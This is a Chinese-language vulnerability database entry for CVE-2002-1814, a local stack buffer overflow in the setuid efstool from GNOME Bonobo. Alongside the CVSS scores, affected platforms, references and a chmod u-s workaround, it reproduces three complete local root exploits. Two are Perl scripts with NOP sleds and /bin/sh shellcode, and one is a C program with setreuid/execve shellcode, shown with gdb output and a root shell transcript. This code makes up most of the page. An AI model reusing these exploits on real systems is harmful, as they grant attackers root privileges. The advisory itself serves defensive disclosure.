CVE-2002-1814
CVSS4.6
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:35
NMCOE    

[原文]Buffer overflow in efstools in Bonobo, when installed setuid, allows local users to execute arbitrary code via long command line arguments.


[CNNVD]Bonobo EFSTool命令行参数本地缓冲区溢出漏洞(CNNVD-200212-741)

        
        efstool是一款Linux操作系统下的EFS文件操作工具。
        efstool对用户提交的命令行参数缺少正确的边界检查,本地攻击者可能利用这个漏洞进行缓冲区溢出攻击。
        本地攻击者可以提交超长的字符串作为参数给efstool程序,可导致efstool产生段错误,由于efstool程序默认以suid root属性安装,精心构建字符串数据可使攻击者以root用户权限在系统中执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2::alpha
cpe:/o:redhat:linux:7.1::alpha
cpe:/o:redhat:linux:6.2::sparc
cpe:/o:redhat:linux:7.0::sparc
cpe:/o:slackware:slackware_linux:8.0Slackware Linux 8.0
cpe:/a:gnome:bonobo
cpe:/o:mandrakesoft:mandrake_linux:8.0MandrakeSoft Mandrake Linux 8.0
cpe:/o:mandrakesoft:mandrake_linux:7.1MandrakeSoft Mandrake Linux 7.1
cpe:/o:redhat:linux:7.1::ia64
cpe:/o:redhat:linux:7.0::i386
cpe:/o:redhat:linux:7.1::i386
cpe:/o:mandrakesoft:mandrake_linux:9.0MandrakeSoft Mandrake Linux 9.0
cpe:/o:redhat:linux:6.2::i386
cpe:/o:redhat:linux:7.0::alpha
cpe:/o:mandrakesoft:mandrake_linux:8.0::ppc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1814
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1814
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-741
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5125
(UNKNOWN)  BID  5125
http://www.securiteam.com/exploits/5AP0E0K8AO.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5AP0E0K8AO.html
http://www.iss.net/security_center/static/9451.php
(UNKNOWN)  XF  linux-efstool-bo(9451)

- 漏洞信息

Bonobo EFSTool命令行参数本地缓冲区溢出漏洞
中危 边界条件错误
2002-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        efstool是一款Linux操作系统下的EFS文件操作工具。
        efstool对用户提交的命令行参数缺少正确的边界检查,本地攻击者可能利用这个漏洞进行缓冲区溢出攻击。
        本地攻击者可以提交超长的字符串作为参数给efstool程序,可导致efstool产生段错误,由于efstool程序默认以suid root属性安装,精心构建字符串数据可使攻击者以root用户权限在系统中执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修补之前暂时使用 chmod u-s 命令去掉efstool程序的suid位。
        厂商补丁:
        RedHat
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ximian.com/devzone/tech/bonobo.html

- 漏洞信息 (21583)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1) (EDBID:21583)
linux local
2002-06-29 Verified
0 clorox
N/A [点击下载]
source: http://www.securityfocus.com/bid/5125/info

Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.

A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. 

#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000

$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";

$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";

if ($ARGV[1] eq "m1") {
        $len = 3000;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
        $len = 10010;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode2;
} else {
        print "You must specify a method fool!\n";
        print "perl $0 <offset> m1 or m2\n";
}

$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"
		

- 漏洞信息 (21584)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2) (EDBID:21584)
linux local
2002-06-29 Verified
0 andrea lisci
N/A [点击下载]
source: http://www.securityfocus.com/bid/5125/info
 
Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.
 
A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. 

#!/usr/bin/perl
# efstool root exploit
# written by andrea lisci
# perl efstool.pl 3000

$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

$ret = "0xbfffe984";
$offset = $ARGV[0];
$nop = "\x90";


 $buffer="'";
        $len = 2652;
        for ($i = 0; $i < $len; $i++) {
                $buffer .= $nop;
        }
 $buffer .= pack('l', ($ret + $offset));

  for ($i = 0; $i < 10000; $i++) {
                $buffer .= $nop;
         }

        $buffer .= $shellcode;
 $buffer .="'";


exec("efstool $buffer");
		

- 漏洞信息 (21585)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3) (EDBID:21585)
linux local
2002-06-29 Verified
0 N4rK07IX
N/A [点击下载]
source: http://www.securityfocus.com/bid/5125/info
  
Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.
  
A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. 

/*
    Author: N4rK07IX
    narkotix@linuxmail.org || kayaem@itu.edu.tr (i think this is useless pop3 box,never checked, inbox is out of memory)

**Vulnerablity: The vulnerablity is OLD and out of date.Mandrake Linux 9.0 "efstool"  libefs1-1.0.20-4mdk  local stack overflow.

[narkotix@labs c-hell]$ efstool `perl -e 'print "A"x2688'`
Segmentation fault
[narkotix@labs c-hell]$
gdb) r `perl -e 'print "A"x2688'`
Starting program: /usr/bin/efstool `perl -e 'print "A"x2688'`
no debugging symbols found)...(no debugging symbols found)...
no debugging symbols found)...(no debugging symbols found)...
no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0xa      10ecx            0xa      10
edx            0x4f4c4554       1330398548
ebx            0x41414141       1094795585
esp            0xbfffe780       0xbfffe780
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x210286 2163334
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0

[narkotix@labs c-hell]$ ./env  <----- This put sh3llc0de with padding 0x90 s to the environment
[narkotix@labs c-hell]$ efstool `perl -e 'print "\x1c\xfd\xff\xbf" x 672'`
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#
Exploited on Mandrake Linux 9.0 in 2003<--- old history :p
efstool must be suid to  get an uid(0), but i saw on many systemz it is not suided ,on my system  it is.
May be when i was asleep my mom had gonna suided it :P

[narkotix@labs c-hell]$ make efs_n4
cc     efs_n4.c   -o efs_n4
[narkotix@labs c-hell]$ ./efs_n4
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#

Scriptkiddi3Z im sorry , this is not an 0Hday ;
Efstool bug is out of fassion.I 've forgetten to release this shit a year ago ,
but today i  found it on my toolz directory.N0w it is fr33...

Greetz: EFnet , laplace_ex , math_monkey,deathmann,ISLAM Nation,EnderUNIX team(Turk BSD crew)
Shoutz: Hi bigmutant , is da default configregister 0x2102 on your cisco1700 ??

Last Words: laplace_ex, bi tane dersi drop etmem lazim Cuma gunu hydraulics labaratuvarinda bekliyorum
            Motorola 68000 kitabin da ben de kaldi onu da getiririm ---> Haftaya duello var:P
*/



#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 2688

static char hell_code[] = //52 bytes sh3llc0de

        //* setreuid(0,0);
        "\x31\xc0"                      // xor    %eax,%eax
        "\x31\xdb"                      // xor    %ebx,%ebx
        "\x31\xc9"                      // xor    %ecx,%ecx
        "\xb0\x46"                      // mov    $0x46,%al
        "\xcd\x80"                      // int    $0x80

        /* setgid(0); */
        "\x31\xdb"                      // xor %ebx,%ebx
        "\x89\xd8"                      // mov %ebx,%eax
        "\xb0\x2e"                      // mov $0x2e,%al
        "\xcd\x80"                      // int $0x80

        // execve /bin/sh
        "\x31\xc0"                      // xor    %eax,%eax
        "\x50"                          // push   %eax
        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
        "\x89\xe3"                      // mov    %esp,%ebx
        "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
        "\x50"                          // push   %eax
        "\x53"                          // push   %ebx
        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
        "\xb0\x0b"                      // mov    $0xb,%al
        "\xcd\x80"                      // int    $0x80

        // exit();
        "\x31\xc0"                      // xor    %eax,%eax
        "\xb0\x01"                      // mov    $0x1,%al
        "\xcd\x80";                     // int    $0x80


main(void) //Th3 l3ss c0d3,th3 b3st performance..
{       printf("Mandrake Linux 9.0 efstool local xploit written by N4rK07IX\n");
        printf("=> narkotix@linuxmail.org\n");
        char *env[2] = {hell_code, NULL};
        char buffer[BUFFERSIZE];

        int i;
        int *lamepointer = (int *)(buffer );

        int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/bin/efstool");


        for (i = 0; i < BUFFERSIZE-1 ; i += 4)
                *lamepointer++ = ret_addr;

        execle("/usr/bin/efstool", "efstool", buffer, NULL,env);
        if(!execle)
        perror("execle()");
        return(0);
}

		

- 漏洞信息

59768
Bonobo efstools Command Line Argument Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站